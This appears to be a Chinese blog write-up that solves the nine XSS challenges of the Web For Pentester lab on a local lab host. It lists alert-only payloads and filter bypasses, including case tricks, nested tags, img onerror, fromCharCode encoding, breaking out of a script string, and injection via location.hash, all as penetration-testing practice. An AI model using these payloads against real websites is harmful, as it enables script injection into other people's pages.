本次做的是Web For Pentester靶机里面的XSS题目，一共有9道题目。
关于靶机搭建参考这篇文章:渗透测试靶机的搭建

首先在后面输入xss:
http://10.211.55.16/xss/example1.php?name=xss
看到如下页面：

然后查看下源码:

感觉这里没有任何的防御措施，忍不住笑出了声。

有很多的标签里面都可以调用HTML的事件属性来弹窗，为了节约时间，下面我就列举出一些比较常用的手法。

利用基本的script标签来弹窗

Payload

<script>alert('xss')</script> 

定义和用法

script 标签用于定义客户端脚本，比如 JavaScript。

效果图

利用iframe标签的的src属性来弹窗

Payload

<iframe src=javascript:alert('xss')></iframe>

定义和用法

iframe 元素会创建包含另外一个文档的内联框架（即行内框架）。

效果图

利用标签的href属性来弹窗

<a href=javascript:alert('xss')>ggtest</a>

标签定义超链接，用于从一张页面链接到另一张页面。
元素最重要的属性是 href 属性，它指示链接的目标。
指向国光博客的一个例子：

<a href="http://git.sqlsec.com”>国光博客</a> 

<img src=1 onerror=alert('xss')>  

<img src=http://www.sqlsec.com/favicon.ico onclick=alert('xss')>  

Keyboard 事件

鼠标（Mouse）事件

定义和用法

img 元素向网页中嵌入一幅图像。
请注意，从技术上讲， 标签并不会在网页中插入图像，而是从网页上链接图像。 标签创建的是被引用图像的占位空间。
标签有两个必需的属性：src 属性 和 alt 属性

凡是支持事件的HTML标签都是可以弹窗的，在HTML中支持事件属性的标签很多，下面我就

列举出一些支持事件的HTML常见标签

第一题因为没有任何的过滤，所以理论上支持调用HTML事件属性的标签都是可以成功弹窗的，下面来个

综合点的payload

http://10.211.55.16/xss/example1.php?name=<button type="button" onclick=alert('xss')>通过按钮点击触发xss</button> <font size="4" color="blue" onmouseover=alert('xss')>  移动到元素触发xss  </font> <br> 
<select> <option onclick=alert('x')>onclick点击触发事件</option> <option values=1 onmousedown=alert('ss')>onmousedown触发</option></select> <a href=javascript:alert('xss')>利用a标签的href属性触发</a> <br>
<textarea placeholder=国光的xss测试：键盘按键触发xss onkeypress=alert('xss')></textarea>

第2题(大小写转换)

这一题的话， 除了<script>alert('xss')</script>这个payload,其他用第一题中的其他payload:

<iframe src=javascript:alert('xss')></iframe>
<a href=javascript:alert('xss')>ggtest</a>
<img src=1 onerror=alert('xss')>
...

依然还是可以的，好吧，为了不这么容易做完这道题目，我们来下面的题目都尽量使用<script>alert('xss')</script>来试试看

查看下源码:

这里我们猜测过滤<script>和</script>
然后这里尝试下大小写转换，尝试着绕过过滤：

<Script>alert('xss')</scripT>

可以看到成功绕过了:

第3题(嵌套构造)

直接输入

<Script>alert('xss')</scripT>

发现大小写转换的这个套路已经不能够使用了

得到结论是:没有过滤alert('xss'),现在就把注意力集中在 <script> 和</script>上
Fuzz测试一下，看看具体过滤了哪些字符？然后再想办法绕过。

http://10.211.55.16/xss/example3.php?name=<></>script<script>

可以看出过滤了:</script>和<script>
尝试构造输入:

http://10.211.55.16/xss/example3.php?name=<sc<script>ript>

查看源码后发现成功构造出

<script> 

于是判断这里只顾虑了一次，接着尝试构造如下完整的payload:

http://10.211.55.16/xss/example3.php?name=<sc<script>ript>alert('xss')</s</script>cript>

第4题(利用标签绕过)

直接输入:<script>alert('xss')</script>发现直接 error 了
于是再次出尝试输入：

http://10.211.55.16/xss/example4.php?name=<>alert('xss')</>

再次得出结论:没有过滤<> </> alerrt('xss'),现在主要想办法对script做个处理来绕过过滤。
然而我各种编码都没有绕过，有的编码的确是绕过了，但是貌似没有解析脚本 =,=
哎~~~放弃用这种形式的<script>alert('xss')</script>的payload了，于是乎使用下面的<img>标签成功绕过：

<img src=1 onerror=alert('xss')>

第5题(String.fromCharCode编码绕过)

首先执行:

<script>alert('xss')</script>

发现直接就 报 error了，于是fuzz测试发现并没有过滤:<script>和</script>
只是过滤了:alert
利用火狐浏览器的hackbar插件对alert('xss')进行String.fromCharCode转换:

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59))</script>

第6题(闭合标签)

首先默认查看下源码:

发现我们输出的hacker作为了一个变量赋值给了a，并且这个变量在<script>这个标签中
这样的话，只要能够突破这个赋值的变量，就可以利用这个<script>这个标签来弹窗了。
下面想办法闭合进行fuzz测试......
这里边看源码边做调整。几次测试后得到如下可以弹窗的payload:

11";</script><img src=1 onerror=alert('xss')><script>

来查看下源码来简单的分析一下:

Hello 
<script>
	var $a= "11";</script><img src=1 onerror=alert('xss')><script>";
</script>
	      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

pauyload最前面的
11";</script> 闭合了前面的<script>标签
最后面的
<script> 闭合了后面的<script>标签
中间的

<img src=1 onerror=alert('xss')>

用来触发 弹窗事件

第7题

首先来查看下源码:

感觉貌似和第6题差不多，于是稍微修改了下使用下面的payload来进行测试:

 hacker';</script><img src=1 onerror=alert('xss')><script>

结果并没有弹窗，赶紧查看下源码压压惊:

可以看到对输入的 <和/和>符号进行转义了，导致我们的弹窗失败。
所以现在的着重点就是 如何处理这些符号:
<和/和>
然而我失败了，对这些符号进行转码也是失败了，后来想了好久终于知道问题所在了:
受到以前闭合一句话木马的缘故,我老是想着闭合首尾的标签
后来仔细想想，这个变量 就在<script>里面，可以在里面直接写alert('xss')来弹窗的，这样也就不需要使用
<和/和>特殊符号了。这么看来的话，第6题 也应该这么来做，奇葩的我，居然是闭合的方式来弹窗的....

http://10.211.55.16/xss/example6.php?name=name=";alert('xss');var b="

查看下源码:

Hello 
<script>
	var $a= "name=";alert('xss');var b="";
</script>
	      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

这里 巧妙的利用了 ; 来在<script>标签里面执行alert('xss')

第8题

是一个输入框,然后输入payload:<img src=1 onerror=alert('xss')>；来试试看,查看源码：

HELLO &lt;img src=1 onerror=alert('xss')&gt;<form action="/xss/example8.php" method="POST">
  Your name:<input type="text" name="name" />
  <input type="submit" name="submit"/>

      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

发现也是对 < > 标签进行转义了，这里进行各种编码也没有绕过。
又是好久也没有成功突破，最后仔细看源码，发现突破点在于

<form action="/xss/example8.php"

这是第8题的URL,于是注意力转移到URL处，尝试在URL后面添加

http://10.211.55.16/xss/example8.php/

查看源码：

发现我们最后添加的 :/ 写在了<form>这个标签中，于是在这里进行fuzz测试，尝试闭合标签，最后构造的payload如下：

http://10.211.55.16/xss/example8.php/"><img src=1 onerror=alert('xss')><form

来查看下源码来分析刚刚构造的payload:

<form action="/xss/example8.php/"><img src=1 onerror=alert('xss')><form" method="POST">
  Your name:<input type="text" name="name" />
  <input type="submit" name="submit"/>

可以看到这里
/"闭合了最前面的<form>
<form> 闭合了最后面的/>
中间的
<img src=1 onerror=alert('xss')> 触发了弹窗事件

第9题

这一题很特殊，不愧是大boss，这里首先查看下源码:

在源码中完全找不到hacker的任何字样，于是仔细百度最可疑的地方:

<script>
  document.write(location.hash.substring(1));
</script>

找到一份资料：http://www.runoob.com/jsref/prop-loc-hash.html
这里可以大概看出这里是读取#后面的东西，于是乎简单的在#后面构造xss语句:

http://10.211.55.16/xss/example9.php#<img src=http://www.sqlsec.com/favicon.ico onclick=alert('Bingo')>

最后一道题目了，得录制个gif来庆祝一下：

小结

虽然这个平台只有9道题目，但是用心去整理拓展，发现可以学到很多xss的姿势，这样又把以前快忘记的xss姿势巩固提高了一下，更好的为不久后挖BAT的XSS漏洞做好基础知识的准备。